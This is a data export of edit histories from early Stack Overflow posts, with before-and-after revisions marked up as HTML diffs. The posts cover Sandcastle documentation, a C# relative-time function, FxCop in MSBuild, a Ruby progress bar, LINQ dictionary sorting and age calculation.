 &lt;p&gt; Click Add Assembly and add your Assembly or Assemblies, add any &lt;code&gt;&lt;span class="diff-delete"&gt;.xml&lt;/span&gt;&lt;/code&gt; Documentation files (the ones generated by the compiler if you enabled that option) and then Build.&lt;/p&gt; _x000D_
 &lt;p&gt; It will take some time, but the result &lt;strong&gt;will&lt;/strong&gt; be worth the effort. It will actually look up stuff from &lt;code&gt;&lt;span class="diff-delete"&gt;MSDN&lt;/span&gt;&lt;/code&gt;, so your resulting documentation will also have the Class Inheritance all the way down to &lt;code&gt;&lt;span class="diff-delete"&gt;System.Object&lt;/span&gt;&lt;/code&gt; with links to &lt;code&gt;&lt;span class="diff-delete"&gt;MSDN&lt;/span&gt;&lt;/code&gt; and stuff.&lt;/p&gt; _x000D_
 &lt;p&gt; Sandcastle seems a bit complicated at first, especially when you want to use it in an automated build, but I am absolutely sure it will be worth the effort.&lt;/p&gt; _x000D_
 &lt;p&gt; Also have a look at &lt;a href="http://www.codeplex.com/SHFB" rel="nofollow noreferrer"&gt;Sandcastle Help File Builder&lt;/a&gt;, this is a somewhat more advanced GUI for it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've just set up Sandcastle again. Try installing it (the May 2008 release) and search for &lt;span class="diff-add"&gt;SandcastleGui.exe&lt;/span&gt; or something similar (it's in the examples folder or so).&lt;/p&gt; _x000D_
 &lt;p&gt; Click Add Assembly and add your Assembly or Assemblies, add any &lt;span class="diff-add"&gt;.xml&lt;/span&gt; Documentation files (the ones generated by the compiler if you enabled that option) and then Build.&lt;/p&gt; _x000D_
 &lt;p&gt; It will take some time, but the result &lt;strong&gt;will&lt;/strong&gt; be worth the effort. It will actually look up stuff from &lt;span class="diff-add"&gt;MSDN&lt;/span&gt;, so your resulting documentation will also have the Class Inheritance all the way down to &lt;span class="diff-add"&gt;System.Object&lt;/span&gt; with links to &lt;span class="diff-add"&gt;MSDN&lt;/span&gt; and stuff.&lt;/p&gt; _x000D_
 &lt;p&gt; Sandcastle seems a bit complicated at first, especially when you want to use it in an automated build, but I am absolutely sure it will be worth the effort.&lt;/p&gt; _x000D_
 &lt;p&gt; Also have a look at &lt;a href="http://www.codeplex.com/SHFB" rel="nofollow noreferrer"&gt;Sandcastle Help File Builder&lt;/a&gt;, this is a somewhat more advanced GUI for it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Jeff, &lt;a href="http://stackoverflow.com/questions/11/how-do-i-calculate-relative-time/12#12"&gt;your code&lt;/a&gt; is nice but could be clearer with constants (as suggested in Code Complete).&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; ts = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; TimeSpan(DateTime.UtcNow.Ticks - dt.Ticks);_x000D_
&lt;span class="hljs-built_in"&gt;double&lt;/span&gt; delta = ts.TotalSecondsMath.Abs(ts.TotalSeconds);_x000D_
&lt;/span&gt;&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; SECOND = &lt;span class="hljs-number"&gt;1&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; MINUTE = &lt;span class="hljs-number"&gt;60&lt;/span&gt; * SECOND;_x000D_
&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; HOUR = &lt;span class="hljs-number"&gt;60&lt;/span&gt; * MINUTE;_x000D_
&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; DAY = &lt;span class="hljs-number"&gt;24&lt;/span&gt; * HOUR;_x000D_
&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; MONTH = &lt;span class="hljs-number"&gt;30&lt;/span&gt; * DAY;_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;0&lt;/span&gt;)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"not yet"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; * MINUTE)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Seconds == &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one second ago"&lt;/span&gt; : ts.Seconds + &lt;span class="hljs-string"&gt;" seconds ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;2&lt;/span&gt; * MINUTE)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"a minute ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;45&lt;/span&gt; * MINUTE)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Minutes + &lt;span class="hljs-string"&gt;" minutes ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;90&lt;/span&gt; * MINUTE)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"an hour ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;24&lt;/span&gt; * HOUR)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Hours + &lt;span class="hljs-string"&gt;" hours ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;48&lt;/span&gt; * HOUR)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"yesterday"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;30&lt;/span&gt; * DAY)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Days + &lt;span class="hljs-string"&gt;" days ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;12&lt;/span&gt; * MONTH)_x000D_
{_x000D_
  &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; months = Convert.ToInt32(Math.Floor((&lt;span class="hljs-built_in"&gt;double&lt;/span&gt;)ts.Days / &lt;span class="hljs-number"&gt;30&lt;/span&gt;));_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; months &amp;lt;= &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one month ago"&lt;/span&gt; : months + &lt;span class="hljs-string"&gt;" months ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;else&lt;/span&gt;_x000D_
{_x000D_
  &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; years = Convert.ToInt32(Math.Floor((&lt;span class="hljs-built_in"&gt;double&lt;/span&gt;)ts.Days / &lt;span class="hljs-number"&gt;365&lt;/span&gt;));_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; years &amp;lt;= &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one year ago"&lt;/span&gt; : years + &lt;span class="hljs-string"&gt;" years ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Jeff, &lt;a href="http://stackoverflow.com/questions/11/how-do-i-calculate-relative-time/12#12"&gt;your code&lt;/a&gt; is nice but could be clearer with constants (as suggested in Code Complete).&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; SECOND = &lt;span class="hljs-number"&gt;1&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; MINUTE = &lt;span class="hljs-number"&gt;60&lt;/span&gt; * SECOND;_x000D_
&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; HOUR = &lt;span class="hljs-number"&gt;60&lt;/span&gt; * MINUTE;_x000D_
&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; DAY = &lt;span class="hljs-number"&gt;24&lt;/span&gt; * HOUR;_x000D_
&lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; MONTH = &lt;span class="hljs-number"&gt;30&lt;/span&gt; * DAY;_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;0&lt;/span&gt;)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"not yet"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; * MINUTE)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Seconds == &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one second ago"&lt;/span&gt; : ts.Seconds + &lt;span class="hljs-string"&gt;" seconds ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;2&lt;/span&gt; * MINUTE)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"a minute ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;45&lt;/span&gt; * MINUTE)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Minutes + &lt;span class="hljs-string"&gt;" minutes ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;90&lt;/span&gt; * MINUTE)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"an hour ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;24&lt;/span&gt; * HOUR)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Hours + &lt;span class="hljs-string"&gt;" hours ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;48&lt;/span&gt; * HOUR)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"yesterday"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;30&lt;/span&gt; * DAY)_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Days + &lt;span class="hljs-string"&gt;" days ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;12&lt;/span&gt; * MONTH)_x000D_
{_x000D_
  &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; months = Convert.ToInt32(Math.Floor((&lt;span class="hljs-built_in"&gt;double&lt;/span&gt;)ts.Days / &lt;span class="hljs-number"&gt;30&lt;/span&gt;));_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; months &amp;lt;= &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one month ago"&lt;/span&gt; : months + &lt;span class="hljs-string"&gt;" months ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;else&lt;/span&gt;_x000D_
{_x000D_
  &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; years = Convert.ToInt32(Math.Floor((&lt;span class="hljs-built_in"&gt;double&lt;/span&gt;)ts.Days / &lt;span class="hljs-number"&gt;365&lt;/span&gt;));_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; years &amp;lt;= &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one year ago"&lt;/span&gt; : years + &lt;span class="hljs-string"&gt;" years ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Grant Thomas</t>
  </si>
  <si>
    <t>genesis</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use the artifact directory variable inside the MSBuild script itself. Here's an example of how I'm running FxCop right now from my &lt;code&gt;&lt;span class="diff-delete"&gt;CC.Net&lt;/span&gt;&lt;/code&gt; MSBuild script (this script is what CC.Net points to - there is also a "Build" target in the script that includes an MSBuild task against the &lt;code&gt;&lt;span class="diff-delete"&gt;SLN&lt;/span&gt;&lt;/code&gt; to do the actual compilation):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;Exec_x000D_
  Command='FxCopCmd.exe /project:"$(MSBuildProjectDirectory)\FXCopRules.FxCop" /out:"$(CCNetArtifactDirectory)\ProjectName.FxCop.xml"'_x000D_
  WorkingDirectory="C:\Program Files\Microsoft FxCop 1.35"_x000D_
  ContinueOnError="true"_x000D_
  IgnoreExitCode="true"_x000D_
/&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use the artifact directory variable inside the MSBuild script itself. Here's an example of how I'm running FxCop right now from my &lt;span class="diff-add"&gt;CC.Net&lt;/span&gt; MSBuild script (this script is what CC.Net points to - there is also a "Build" target in the script that includes an MSBuild task against the &lt;span class="diff-add"&gt;SLN&lt;/span&gt; to do the actual compilation):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;Exec_x000D_
  Command='FxCopCmd.exe /project:"$(MSBuildProjectDirectory)\FXCopRules.FxCop" /out:"$(CCNetArtifactDirectory)\ProjectName.FxCop.xml"'_x000D_
  WorkingDirectory="C:\Program Files\Microsoft FxCop 1.35"_x000D_
  ContinueOnError="true"_x000D_
  IgnoreExitCode="true"_x000D_
/&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Greg Hurlman</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'd like to create a progress bar to indicate the status of an a batch job in Ruby.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; I've read some &lt;a href="http://tldp.org/HOWTO/NCURSES-Programming-HOWTO/" rel="nofollow noreferrer" title="NCURSES Programming HOWTO"&gt;tutorials&lt;/a&gt; / &lt;a href="http://ncurses-ruby.berlios.de/" rel="nofollow noreferrer" title="ncurses-ruby"&gt;libraries&lt;/a&gt; on using &lt;code&gt;&lt;span class="diff-delete"&gt;ncurses&lt;/span&gt;&lt;/code&gt;, none of which were particularly helpful in explaining how create an &lt;em&gt;&lt;span class="diff-delete"&gt;"animated" progress bar&lt;/span&gt;&lt;/em&gt; in the terminal or using curses with Ruby.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; I'm already aware of using a separate thread to monitor the progress of a given job, I'm just not sure how to proceed with drawing a progress bar.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt; &lt;a href="http://0xcc.net/ruby-progressbar/" rel="nofollow noreferrer" title="ruby-progressbar"&gt;ProgressBar&lt;/a&gt; class was incredibly straight-forward, perfectly solved my problem.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'd like to create a progress bar to indicate the status of an a batch job in Ruby. I've read some &lt;a href="http://tldp.org/HOWTO/NCURSES-Programming-HOWTO/" rel="nofollow noreferrer" title="NCURSES Programming HOWTO"&gt;tutorials&lt;/a&gt; / &lt;a href="http://ncurses-ruby.berlios.de/" rel="nofollow noreferrer" title="ncurses-ruby"&gt;libraries&lt;/a&gt; on using &lt;span class="diff-add"&gt;ncurses&lt;/span&gt;, none of which were particularly helpful in explaining how create an &lt;span class="diff-add"&gt;"animated" progress bar&lt;/span&gt; in the terminal or using curses with Ruby. I'm already aware of using a separate thread to monitor the progress of a given job, I'm just not sure how to proceed with drawing a progress bar.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt; &lt;a href="http://0xcc.net/ruby-progressbar/" rel="nofollow noreferrer" title="ruby-progressbar"&gt;ProgressBar&lt;/a&gt; class was incredibly straight-forward, perfectly solved my problem.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Why not use &lt;code&gt;&lt;span class="diff-delete"&gt;LINQ&lt;/span&gt;&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;Dictionary&amp;lt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;, &lt;span class="hljs-built_in"&gt;int&lt;/span&gt;&amp;gt; myDict = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Dictionary&amp;lt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;, &lt;span class="hljs-built_in"&gt;int&lt;/span&gt;&amp;gt;();&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
myDict.Add(&lt;span class="hljs-string"&gt;"one"&lt;/span&gt;, &lt;span class="hljs-number"&gt;1&lt;/span&gt;);_x000D_
myDict.Add(&lt;span class="hljs-string"&gt;"four"&lt;/span&gt;, &lt;span class="hljs-number"&gt;4&lt;/span&gt;);_x000D_
myDict.Add(&lt;span class="hljs-string"&gt;"two"&lt;/span&gt;, &lt;span class="hljs-number"&gt;2&lt;/span&gt;);_x000D_
myDict.Add(&lt;span class="hljs-string"&gt;"three"&lt;/span&gt;, &lt;span class="hljs-number"&gt;3&lt;/span&gt;);_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; sortedDict = (&lt;span class="hljs-keyword"&gt;from&lt;/span&gt; entry &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; myDict &lt;span class="hljs-keyword"&gt;orderby&lt;/span&gt; entry.Value &lt;span class="hljs-keyword"&gt;ascending&lt;/span&gt; &lt;span class="hljs-keyword"&gt;select&lt;/span&gt; entry)&lt;span class="diff-delete"&gt;_x000D_
    &lt;/span&gt;.ToDictionary(pair =&amp;gt; pair.Key, pair =&amp;gt; pair.Value);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This would also allow for great flexibility in that you can select the top 10, 20 10% etc. Or if you are using your word frequency index for &lt;code&gt;&lt;span class="diff-delete"&gt;type-ahead&lt;/span&gt;&lt;/code&gt;, you could also include &lt;code&gt;&lt;span class="diff-delete"&gt;StartsWith&lt;/span&gt;&lt;/code&gt; clause as well.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Why not use &lt;span class="diff-add"&gt;LINQ&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;System.Collections.Generic.&lt;/span&gt;Dictionary&amp;lt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;, &lt;span class="hljs-built_in"&gt;int&lt;/span&gt;&amp;gt; myDict = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Dictionary&amp;lt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;, &lt;span class="hljs-built_in"&gt;int&lt;/span&gt;&amp;gt;();_x000D_
&lt;span class="diff-add"&gt;    &lt;/span&gt;myDict.Add(&lt;span class="hljs-string"&gt;"one"&lt;/span&gt;, &lt;span class="hljs-number"&gt;1&lt;/span&gt;);_x000D_
&lt;span class="diff-add"&gt;    &lt;/span&gt;myDict.Add(&lt;span class="hljs-string"&gt;"four"&lt;/span&gt;, &lt;span class="hljs-number"&gt;4&lt;/span&gt;);_x000D_
&lt;span class="diff-add"&gt;    &lt;/span&gt;myDict.Add(&lt;span class="hljs-string"&gt;"two"&lt;/span&gt;, &lt;span class="hljs-number"&gt;2&lt;/span&gt;);_x000D_
&lt;span class="diff-add"&gt;    &lt;/span&gt;myDict.Add(&lt;span class="hljs-string"&gt;"three"&lt;/span&gt;, &lt;span class="hljs-number"&gt;3&lt;/span&gt;);_x000D_
_x000D_
&lt;span class="diff-add"&gt;    &lt;/span&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; sortedDict = (&lt;span class="hljs-keyword"&gt;from&lt;/span&gt; entry &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; myDict &lt;span class="hljs-keyword"&gt;orderby&lt;/span&gt; entry.Value &lt;span class="hljs-keyword"&gt;ascending&lt;/span&gt; &lt;span class="hljs-keyword"&gt;select&lt;/span&gt; entry).ToDictionary(pair =&amp;gt; pair.Key, pair =&amp;gt; pair.Value);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This would also allow for great flexibility in that you can select the top 10, 20 10% etc. Or if you are using your word frequency index for &lt;span class="diff-add"&gt;type-ahead&lt;/span&gt;, you could also include &lt;span class="diff-add"&gt;StartsWith&lt;/span&gt; clause as well.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>nawfal</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; On windows, curses works out of the box, ncurses doesn't, and for a progress bar curses should be sufficient. So, use curses instead of &lt;code&gt;&lt;span class="diff-delete"&gt;ncurses&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, both curses and ncurses are wafer-thin wrappers around the &lt;code&gt;&lt;span class="diff-delete"&gt;C library&lt;/span&gt;&lt;/code&gt; - that means you don't really need Ruby-specific tutorials.&lt;/p&gt; _x000D_
 &lt;p&gt; However, on the &lt;a href="http://www.pragprog.com/titles/ruby/source_code" rel="nofollow noreferrer"&gt;site for the PickAxe&lt;/a&gt; you can download all the code examples for the book. The file "ex1423.rb" contains a curses demo which plays Pong - that should give you plenty of material to get you going.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; On windows, curses works out of the box, ncurses doesn't, and for a progress bar curses should be sufficient. So, use curses instead of &lt;span class="diff-add"&gt;ncurses&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, both curses and ncurses are wafer-thin wrappers around the &lt;span class="diff-add"&gt;c library&lt;/span&gt; - that means you don't really need Ruby-specific tutorials.&lt;/p&gt; _x000D_
 &lt;p&gt; However, on the &lt;a href="http://www.pragprog.com/titles/ruby/source_code" rel="nofollow noreferrer"&gt;site for the PickAxe&lt;/a&gt; you can download all the code examples for the book. The file "ex1423.rb" contains a curses demo which plays Pong - that should give you plenty of material to get you going.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Personally I think curses is overkill in this case. While the curses lib is nice (and I frequently use it myself) it's a &lt;code&gt;&lt;span class="diff-delete"&gt;PITA&lt;/span&gt;&lt;/code&gt; to relearn every time I haven't needed it for 12 months which has to be the sign of a bad interface design.&lt;/p&gt; _x000D_
 &lt;p&gt; If for some reason you can't get on with &lt;a href="http://stackoverflow.com/questions/1306/#1318"&gt;the progress bar lib Joey suggested&lt;/a&gt; roll your own and release it under a pretty free licence for instant kudos :)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Personally I think curses is overkill in this case. While the curses lib is nice (and I frequently use it myself) it's a &lt;span class="diff-add"&gt;PITA&lt;/span&gt; to relearn every time I haven't needed it for 12 months which has to be the sign of a bad interface design.&lt;/p&gt; _x000D_
 &lt;p&gt; If for some reason you can't get on with &lt;a href="http://stackoverflow.com/questions/1306/#1318"&gt;the progress bar lib Joey suggested&lt;/a&gt; roll your own and release it under a pretty free licence for instant kudos :)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;For some reason Jeff&lt;span class="hljs-string"&gt;'s code didn'&lt;/span&gt;t seem simple enough. To me &lt;span class="hljs-keyword"&gt;this&lt;/span&gt; seems simpler &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; easier to understand:_x000D_
_x000D_
   DateTime birthdate = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; DateTime(&lt;span class="hljs-number"&gt;2012&lt;/span&gt;, &lt;span class="hljs-number"&gt;11&lt;/span&gt;, &lt;span class="hljs-number"&gt;5&lt;/span&gt;);_x000D_
            &lt;/span&gt;DateTime &lt;span class="diff-delete"&gt;now&lt;/span&gt; = DateTime.&lt;span class="diff-delete"&gt;Now;&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;            &lt;/span&gt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; &lt;span class="diff-delete"&gt;years&lt;/span&gt; = &lt;span class="diff-delete"&gt;now&lt;/span&gt;.Year - &lt;span class="diff-delete"&gt;birthdate&lt;/span&gt;.Year;_x000D_
&lt;span class="diff-delete"&gt;            &lt;/span&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (&lt;span class="diff-delete"&gt;now.Month&lt;/span&gt; &lt;span class="diff-delete"&gt;&amp;lt;&lt;/span&gt; &lt;span class="diff-delete"&gt;birthdate&lt;/span&gt;.&lt;span class="diff-delete"&gt;Month || &lt;/span&gt;(&lt;span class="diff-delete"&gt;now.Month == birthdate.Month &amp;amp;&amp;amp; now.Day &amp;lt; birthdate.Day&lt;/span&gt;))&lt;span class="diff-delete"&gt;_x000D_
               &lt;/span&gt; &lt;span class="diff-delete"&gt;years&lt;/span&gt;--&lt;span class="diff-delete"&gt;;_x000D_
           Console.WriteLine(years.ToString());_x000D_
           Console.ReadLine()&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; For some reason Jeff's code didn't seem simple enough. To me this seems simpler and easier to understand:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;DateTime &lt;span class="diff-add"&gt;today&lt;/span&gt; = DateTime.&lt;span class="diff-add"&gt;Today;&lt;/span&gt;_x000D_
&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; &lt;span class="diff-add"&gt;age&lt;/span&gt; = &lt;span class="diff-add"&gt;today&lt;/span&gt;.Year - &lt;span class="diff-add"&gt;bday&lt;/span&gt;.Year;_x000D_
